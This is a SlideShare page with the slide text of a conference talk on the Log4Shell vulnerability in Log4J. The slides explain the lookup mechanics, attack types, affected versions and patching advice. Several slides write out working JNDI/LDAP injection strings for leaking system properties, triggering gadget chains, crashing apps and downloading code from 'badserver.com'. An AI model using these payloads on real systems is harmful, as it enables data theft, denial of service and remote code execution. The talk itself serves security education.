SlideShare a Scribd company logo

Log4Shell - Armageddon or Opportunity.pptx

Download as PPTX, PDF
Steve Poole
Steve Poole

It’s said that everyone remembers where they were when a momentous event occurs. Where were you on the 10 December 2021 or did the most comprehensively dangerous Java vulnerability pass you by? Don’t be fooled into thinking it’s all over. Even by mid year the number of vulnerable servers will still be high because organisations still fail assess their vulnerability state correctly. In this session I’ll cover, in detail, the actual mechanics of the vulnerability and demo a simple attack. I’ll take you through why this vulnerability can be as bad as it gets and explain what the options are to protect you application and how to assess if you’re still at risk. It’s not all bad news. The Log4Shell wake up call shows us that we’re not paying the right sort of attention to security across the board but we can learn to do better. I’ll end the talk with explaining why security really matters, what developers can do improve their understanding of security principles in general and cover some of the practical next steps that are available. Log4Shell is changing our world - let’s make sure its for the right reasons. Opportunity is knocking on your door.

Technology
1 of 53
Log4Shell - Armageddon or Opportunity Steve Poole @spoole167
9th December - a normal day at the office
10h December 2021
And then it grew
And grew
And grew
And grew
Log4Shell may be the worst ever vulnerability
It just keeps on giving
Log4J vulnerability - the wrong thing at the wrong time, for a long time Log4J CVE-2021-44228 - Fixes a problem that’s been around since 2014
Today The basics behind most Java exploits The mechanics of a Log4JShell exploit A Log4Shell demo Breaking down the attack types : risk, reward, detection, applicability Prevention / related tools Larger consequences - why the White House got involved Wake up call - understanding that fire-drills are here to stay. Revisiting your supply chains Wrap up
The basics behind most Java exploits Main Objective Arbitrary Remote code execution. Bad Actors can do whatever they want Steal data, change data, add malware … Use Java serialization or text-to-execution vehicles (from xml tags to scripting languages to text formatters) Leave no trace Secondary Objective Leak, change, insert data. Secrets, configs, device info etc Gadget chains, human error, limited ability to manipulate config data
The basics behind most Java exploits Attacks come from relentless scripted botnets using sophisticated tools to probe end points Imagine a burglar, trying every door and window, in every building on the planet every moment of the day and night
Reverse Engineering Fuzzing calls and data.. GET /users/1 POST /users/2 PUT /users/20000?name=“(select GET /users/-1
Reverse Engineering With sophisticated tools
Fuzzing calls and data. Reverse Engineering Fuzz urls, json payloads, xml payloads, binary payloads … Import / export / upload / download options .. Command line options, file formats … “known-to-be-dangerous” values In the public domain Widespread & mature Automatic ‘protocol’ detection & exploitation
Log4Shell is a gift to the bad actors. It’s been there since 2014
Log4J - the exploited mechanics Probably every Java developer has or is using Log4J. Somewhere in the code will be a couple of imports and a field import org.slf4j.Logger; import org.slf4j.LoggerFactory; Logger logger = LoggerFactory.getLogger(<Class>.class); Then throughout the code will be various calls to the logger to record data : logger.info(“Entering application”); logger.debug(“device id {}”,id); logger.info(“X-Header {}”,headers[‘X-Header’]);
Log4J - the exploited mechanics Then the log might have 2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application 2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ 2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa
Log4J - the exploited mechanics 2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application 2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ 2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa logger.info(“Entering application”); logger.debug(“device id {}”,id); logger.info(“X-Header {}”,headers[‘X-Header’]); Since log4J is a debugging tool its important record input data asis
If the application or component is used in different environments then recording basic info in the log would be good! But Log4J makes it even easier for you Log4J - the exploited mechanics logger.info(“version {}”,System.getProperties(“java.version”); logger.info(“version ${sys:java.version}”); 022-01-01 09:07:41,508 [main] INFO MyApp - version 1.17.1
These substitution parameters or ‘lookups” provide convenience and robustness. ${sys:<system-property-name>} ${env:<environmental-name>} ${log4j:configLocation} Log4J - the exploited mechanics
User-Agent: Mozilla/5.0 Put together the expectation to log input data asis + lookups Log4J - the exploited mechanics log.info(“User Agent: {}”,userAgent); 2022-01-01 09:07:41 [main] INFO User Agent: Mozilla/5.0 User-Agent: ${sys:java.version} log.info(“User Agent: {}”,userAgent); 2022-01-01 09:07:41 [main] INFO User Agent: 1.8.0
Log4J - the exploited mechanics We’re not finished yet. In 2014 a new Lookup was added for JNDI to allow logging of service configuration info in a consistent way. No different from the other lookups. However..
Log4J - the exploited mechanics We’re not finished yet. In 2014 a new Lookup was added for JNDI to allow logging of service configuration info in a consistent way. No different from the other lookups. However.. The lookup also enabled other registered JNDI services to be used. Ldap, RMI, DNS …
Log4J - the exploited mechanics One more thing. For most Log4J versions processing substitution parameters is recursive: ${sys:<system-property- name>} Envvar MODE=”${sys.java.version}” Log: log.info(“${env:MODE}”) Result “1.8.1” etc
Log4J - the exploited mechanics Situation: Over powerful Log4J lookups and substitution process coupled with a desire to write input data asis Result: field day for bad actors Within 4 days half of all global corporate networks globally had been actively probed, with over 60 variants of the exploit
Let’s see it in action
What you saw Exposing environment data Transmitting environment data Running a gadget chain Arbitrary Remote Code Execution A simple hidden attack
Exposing environmental data Concept: Impact: At risk: Can the bad actor force sensitive data to appear in the log? Low as a standalone attack. No immediate feedback High if logs are visible ( compromised server, log aggregators) java version, classpath, properties that are publicly known,can be guessed (see fuzzing) ${sys:java.version}
Aside - logs are more vulnerable than you might imagine Sometimes logs (and other files) are accessible externally
Aside - logs are more vulnerable than you might imagine Easily found via
Aside - logs are more vulnerable than you might imagine useful search terms exploit-db.com
Transmitting environmental data Concept: Impact: At risk: Can the bad actor send sensitive data to another server? Medium to High. IP info is leaked at a minimum High if recursive substitution available java version, classpath, properties that are publicly known,can be guessed (see fuzzing) ${jndi:ldap://ldap.dev:1389/cn=version}
${jndi:ldap://ldap.dev:1389/cn=version} ${jndi:ldap://ldap.dev:1389/echo/${sys:java.version}} ${jndi:ldap://ldap.dev:1389/echo/1.8_01} sent to the ldap server Which sends back Which gets evaluated by log4j. sends back
Running a gadget chain Concept: Impact: At risk: Can the bad actor cause code to execute under their control? High to Very High. Java Gadget chains are complicated but easily constructed. Arbitrary RCEs are possible Everything. Access to data, systems etc. ${jndi:ldap://ldap.dev:1389/cn=gadget}
A simple gadget chain HashMap m = new HashMap<>(); m.put("key is $${sys:java.version}", "${sys:java.version}"); List<String> list = new LinkedList<>(); list.add("this"); list.add("is"); list.add("a"); list.add("nested"); list.add("list"); m.put("gadget-chain", list); ${jndi:ldap://ldap.dev:1389/cn=gadget} This call expects a serialized Java object stream to be retuned
Various results 2.0 - 2.3 2.4- 2.5 add todo(title=${jndi:ldap://ldap.dev:1389/cn=gadget}, status=ACTIVE) 2.3.1, 2.3.2 2.15-2.17.1 add todo(title={gadget-chain=[this, is, a, nested, list], key is 1.8.0_102=1.8.0_102}, status=ACTIVE) 2.6-2.14.1
Running a gadget chain to cause a DoS Concept: Impact: At risk: Can the bad actor cause code to crash an application High to Very High. Easy to achieve. Availability. Leads to Ransom threats ${jndi:ldap://ldap.dev:1389/cn=boom}
A simple DOS gadget chain Object[][] o=new Object[][]{ new Object[0]}; Use serialization tools to turn it into Object[][] o= new Object[INT_MAX][INT_MAX] // not real java OOM every time? ${jndi:ldap://ldap.dev:1389/cn=boom} This call expects a serialized Java object stream to be retuned
Arbitrary Remote Code Execution For some versions of Log4J we’re lucky. The RCE fails unintentionally This got “fixed” Casting (String) replaced with a toString():
Arbitrary Remote Code Execution Reference ref = new Reference("ExternalObject", "ExternalObject", “http://badserver.com/code/"); If the returned object is one of these ${jndi:ldap://ldap.dev:1389/cn=rce} This call makes log4J go to the badserver and downloads …
Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory
Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception With this method
Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception With this method method get executed in the application and any required code is downloaded from the bad server
Arbitrary Remote Code Execution Various results: older Java versions 2.0 - 2.3 , 2.4-2.12.1, 2.13.0-2.14.1 2.3.1,2.3.2, 2.12.2-2.12.14, 2.15+
Arbitrary Remote Code Execution Various results: Java 17+
Hidden attacks ${jndi:ldap://ldap.dev:1389/a} Take the RCE attack and spin it slightly. Ensure the last object returned is a String
Hidden attacks ${jndi:ldap://ldap.dev:1389/a} Although the JNDI defaults to trust remote were changed in Java. they can still be turned on. Especially vulnerable is tools that launch processes com.sun.jndi.ldap.object.trustURLCodebase com.sun.jndi.ldap.object.trustSerialData
Log4Shell is deadly Move to the latest version of Log4J Move to the latest version of Java you can Re evaluate your scanning checking tools. Many do not do a good job!! Also look for fatjars with log4j code
We’re not doing a good Job patching https://www.sonatype.com/resource s/log4j-vulnerability-resource-center
The last bits Larger consequences - why the White House got involved Wake up call - understanding that fire-drills are here to stay. Revisiting your supply chains
Thank you

Recommended

Auscert 2022 - log4shell and history of Java deserialisation RCE
Auscert 2022 - log4shell and history of Java deserialisation RCEAuscert 2022 - log4shell and history of Java deserialisation RCE
Auscert 2022 - log4shell and history of Java deserialisation RCEDavid Jorm
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Codemotion
 
FusionInventory at LSM/RMLL 2012
FusionInventory at LSM/RMLL 2012FusionInventory at LSM/RMLL 2012
FusionInventory at LSM/RMLL 2012Nouh Walid
 
Introduction to Dynamic Analysis of Android Application
Introduction to Dynamic Analysis of Android ApplicationIntroduction to Dynamic Analysis of Android Application
Introduction to Dynamic Analysis of Android ApplicationKelwin Yang
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)David Jorm
 
Java code coverage with JCov. Implementation details and use cases.
Java code coverage with JCov. Implementation details and use cases.Java code coverage with JCov. Implementation details and use cases.
Java code coverage with JCov. Implementation details and use cases.Alexandre (Shura) Iline
 
FIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE
 
Java 7 - New Features - by Mihail Stoynov and Svetlin Nakov
Java 7 - New Features - by Mihail Stoynov and Svetlin NakovJava 7 - New Features - by Mihail Stoynov and Svetlin Nakov
Java 7 - New Features - by Mihail Stoynov and Svetlin NakovSvetlin Nakov
 

Recommended

Auscert 2022 - log4shell and history of Java deserialisation RCE
Auscert 2022 - log4shell and history of Java deserialisation RCEAuscert 2022 - log4shell and history of Java deserialisation RCE
Auscert 2022 - log4shell and history of Java deserialisation RCEDavid Jorm
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Codemotion
 
FusionInventory at LSM/RMLL 2012
FusionInventory at LSM/RMLL 2012FusionInventory at LSM/RMLL 2012
FusionInventory at LSM/RMLL 2012Nouh Walid
 
Introduction to Dynamic Analysis of Android Application
Introduction to Dynamic Analysis of Android ApplicationIntroduction to Dynamic Analysis of Android Application
Introduction to Dynamic Analysis of Android ApplicationKelwin Yang
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)David Jorm
 
Java code coverage with JCov. Implementation details and use cases.
Java code coverage with JCov. Implementation details and use cases.Java code coverage with JCov. Implementation details and use cases.
Java code coverage with JCov. Implementation details and use cases.Alexandre (Shura) Iline
 
FIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE
 
Java 7 - New Features - by Mihail Stoynov and Svetlin Nakov
Java 7 - New Features - by Mihail Stoynov and Svetlin NakovJava 7 - New Features - by Mihail Stoynov and Svetlin Nakov
Java 7 - New Features - by Mihail Stoynov and Svetlin NakovSvetlin Nakov
 
Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesZabbix
 
Rein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4jRein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4jRazorsight
 
iOS Client Side Analysis
iOS Client Side AnalysisiOS Client Side Analysis
iOS Client Side AnalysisAadarsh N
 
How to debug IoT Agents
How to debug IoT AgentsHow to debug IoT Agents
How to debug IoT AgentsFernando Lopez Aguilar
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Hadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionHadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionCloudera, Inc.
 
Getting Native with NDK
Getting Native with NDKGetting Native with NDK
Getting Native with NDKナム-Nam Nguyễn
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Deep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UKDeep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UKJosé Paumard
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Software Development
Introduction to Software DevelopmentIntroduction to Software Development
Introduction to Software DevelopmentZeeshan MIrza
 
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!Priyanka Aash
 
Integrating Splunk into your Spring Applications
Integrating Splunk into your Spring ApplicationsIntegrating Splunk into your Spring Applications
Integrating Splunk into your Spring ApplicationsDamien Dallimore
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Rémi Jullian
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web ArtisansRaf Kewl
 
ASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdfASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdfMiro Wengner
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Stored-Procedures-Presentation
Stored-Procedures-PresentationStored-Procedures-Presentation
Stored-Procedures-PresentationChuck Walker
 
SD, a P2P bug tracking system
SD, a P2P bug tracking systemSD, a P2P bug tracking system
SD, a P2P bug tracking systemJesse Vincent
 
Iz Pack
Iz PackIz Pack
Iz PackInria
 
Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...Steve Poole
 
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECHTHRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECHSteve Poole
 

More Related Content

Similar to Log4Shell - Armageddon or Opportunity.pptx

Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesZabbix
 
Rein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4jRein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4jRazorsight
 
iOS Client Side Analysis
iOS Client Side AnalysisiOS Client Side Analysis
iOS Client Side AnalysisAadarsh N
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Hadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionHadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionCloudera, Inc.
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Deep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UKDeep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UKJosé Paumard
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Software Development
Introduction to Software DevelopmentIntroduction to Software Development
Introduction to Software DevelopmentZeeshan MIrza
 
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!Priyanka Aash
 
Integrating Splunk into your Spring Applications
Integrating Splunk into your Spring ApplicationsIntegrating Splunk into your Spring Applications
Integrating Splunk into your Spring ApplicationsDamien Dallimore
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Rémi Jullian
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web ArtisansRaf Kewl
 
ASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdfASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdfMiro Wengner
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Stored-Procedures-Presentation
Stored-Procedures-PresentationStored-Procedures-Presentation
Stored-Procedures-PresentationChuck Walker
 
SD, a P2P bug tracking system
SD, a P2P bug tracking systemSD, a P2P bug tracking system
SD, a P2P bug tracking systemJesse Vincent
 
Iz Pack
Iz PackIz Pack
Iz PackInria
 

Similar to Log4Shell - Armageddon or Opportunity.pptx (20)

Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent Issues
 
Rein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4jRein_in_the_ability_of_log4j
Rein_in_the_ability_of_log4j
 
iOS Client Side Analysis
iOS Client Side AnalysisiOS Client Side Analysis
iOS Client Side Analysis
 
How to debug IoT Agents
How to debug IoT AgentsHow to debug IoT Agents
How to debug IoT Agents
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
Hadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionHadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault Injection
 
Getting Native with NDK
Getting Native with NDKGetting Native with NDK
Getting Native with NDK
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
 
Deep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UKDeep Dive Java 17 Devoxx UK
Deep Dive Java 17 Devoxx UK
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Software Development
Introduction to Software DevelopmentIntroduction to Software Development
Introduction to Software Development
 
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!
 
Integrating Splunk into your Spring Applications
Integrating Splunk into your Spring ApplicationsIntegrating Splunk into your Spring Applications
Integrating Splunk into your Spring Applications
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web Artisans
 
ASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdfASML_FlightRecorderMeetsJava.pdf
ASML_FlightRecorderMeetsJava.pdf
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Stored-Procedures-Presentation
Stored-Procedures-PresentationStored-Procedures-Presentation
Stored-Procedures-Presentation
 
SD, a P2P bug tracking system
SD, a P2P bug tracking systemSD, a P2P bug tracking system
SD, a P2P bug tracking system
 
Iz Pack
Iz PackIz Pack
Iz Pack
 

More from Steve Poole

Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...Steve Poole
 
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECHTHRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECHSteve Poole
 
Maven Central++ What's happening at the core of the Java supply chain
Maven Central++ What's happening at the core of the Java supply chainMaven Central++ What's happening at the core of the Java supply chain
Maven Central++ What's happening at the core of the Java supply chainSteve Poole
 
GIDS-2023 A New Hope for 2023? What Developers Must Learn Next
GIDS-2023 A New Hope for 2023? What Developers Must Learn NextGIDS-2023 A New Hope for 2023? What Developers Must Learn Next
GIDS-2023 A New Hope for 2023? What Developers Must Learn NextSteve Poole
 
A new hope for 2023? What developers must learn next
A new hope for 2023? What developers must learn nextA new hope for 2023? What developers must learn next
A new hope for 2023? What developers must learn nextSteve Poole
 
Stop Security by Sleight Of Hand.pptx
Stop Security by Sleight Of Hand.pptxStop Security by Sleight Of Hand.pptx
Stop Security by Sleight Of Hand.pptxSteve Poole
 
Superman or Ironman - can everyone be a 10x developer?
Superman or Ironman - can everyone be a 10x developer?Superman or Ironman - can everyone be a 10x developer?
Superman or Ironman - can everyone be a 10x developer?Steve Poole
 
The Secret Life of Maven Central
The Secret Life of Maven CentralThe Secret Life of Maven Central
The Secret Life of Maven CentralSteve Poole
 
The Secret Life of Maven Central.pptx
The Secret Life of Maven Central.pptxThe Secret Life of Maven Central.pptx
The Secret Life of Maven Central.pptxSteve Poole
 
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...Steve Poole
 
DevnexusRansomeware.pptx
DevnexusRansomeware.pptxDevnexusRansomeware.pptx
DevnexusRansomeware.pptxSteve Poole
 
Game Over or Game Changing? Why Software Development May Never be the same again
Game Over or Game Changing? Why Software Development May Never be the same againGame Over or Game Changing? Why Software Development May Never be the same again
Game Over or Game Changing? Why Software Development May Never be the same againSteve Poole
 
Cybercrime and the developer 2021 style
Cybercrime and the developer 2021 styleCybercrime and the developer 2021 style
Cybercrime and the developer 2021 styleSteve Poole
 
Agile Islands 2020 - Dashboards and Culture
Agile Islands 2020 - Dashboards and CultureAgile Islands 2020 - Dashboards and Culture
Agile Islands 2020 - Dashboards and CultureSteve Poole
 
LJC Speaker Clnic June 2020
LJC Speaker Clnic June 2020LJC Speaker Clnic June 2020
LJC Speaker Clnic June 2020Steve Poole
 
Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...
Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...
Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...Steve Poole
 
Beyond the Pi: What’s Next for the Hacker in All of Us?
Beyond the Pi: What’s Next for the Hacker in All of Us?Beyond the Pi: What’s Next for the Hacker in All of Us?
Beyond the Pi: What’s Next for the Hacker in All of Us?Steve Poole
 
A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization Steve Poole
 
Eclipse OpenJ9 - SpringOne 2018 Lightning talk
Eclipse OpenJ9 - SpringOne 2018 Lightning talkEclipse OpenJ9 - SpringOne 2018 Lightning talk
Eclipse OpenJ9 - SpringOne 2018 Lightning talkSteve Poole
 
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...Steve Poole
 

More from Steve Poole (20)

Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...Key Takeaways for Java Developers from the State of the Software Supply Chain...
Key Takeaways for Java Developers from the State of the Software Supply Chain...
 
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECHTHRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
THRIVING IN THE GEN AI ERA: NAVIGATING CHANGE IN TECH
 
Maven Central++ What's happening at the core of the Java supply chain
Maven Central++ What's happening at the core of the Java supply chainMaven Central++ What's happening at the core of the Java supply chain
Maven Central++ What's happening at the core of the Java supply chain
 
GIDS-2023 A New Hope for 2023? What Developers Must Learn Next
GIDS-2023 A New Hope for 2023? What Developers Must Learn NextGIDS-2023 A New Hope for 2023? What Developers Must Learn Next
GIDS-2023 A New Hope for 2023? What Developers Must Learn Next
 
A new hope for 2023? What developers must learn next
A new hope for 2023? What developers must learn nextA new hope for 2023? What developers must learn next
A new hope for 2023? What developers must learn next
 
Stop Security by Sleight Of Hand.pptx
Stop Security by Sleight Of Hand.pptxStop Security by Sleight Of Hand.pptx
Stop Security by Sleight Of Hand.pptx
 
Superman or Ironman - can everyone be a 10x developer?
Superman or Ironman - can everyone be a 10x developer?Superman or Ironman - can everyone be a 10x developer?
Superman or Ironman - can everyone be a 10x developer?
 
The Secret Life of Maven Central
The Secret Life of Maven CentralThe Secret Life of Maven Central
The Secret Life of Maven Central
 
The Secret Life of Maven Central.pptx
The Secret Life of Maven Central.pptxThe Secret Life of Maven Central.pptx
The Secret Life of Maven Central.pptx
 
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...
Devoxx France 2022: Game Over or Game Changing? Why Software Development May ...
 
DevnexusRansomeware.pptx
DevnexusRansomeware.pptxDevnexusRansomeware.pptx
DevnexusRansomeware.pptx
 
Game Over or Game Changing? Why Software Development May Never be the same again
Game Over or Game Changing? Why Software Development May Never be the same againGame Over or Game Changing? Why Software Development May Never be the same again
Game Over or Game Changing? Why Software Development May Never be the same again
 
Cybercrime and the developer 2021 style
Cybercrime and the developer 2021 styleCybercrime and the developer 2021 style
Cybercrime and the developer 2021 style
 
Agile Islands 2020 - Dashboards and Culture
Agile Islands 2020 - Dashboards and CultureAgile Islands 2020 - Dashboards and Culture
Agile Islands 2020 - Dashboards and Culture
 
LJC Speaker Clnic June 2020
LJC Speaker Clnic June 2020LJC Speaker Clnic June 2020
LJC Speaker Clnic June 2020
 
Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...
Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...
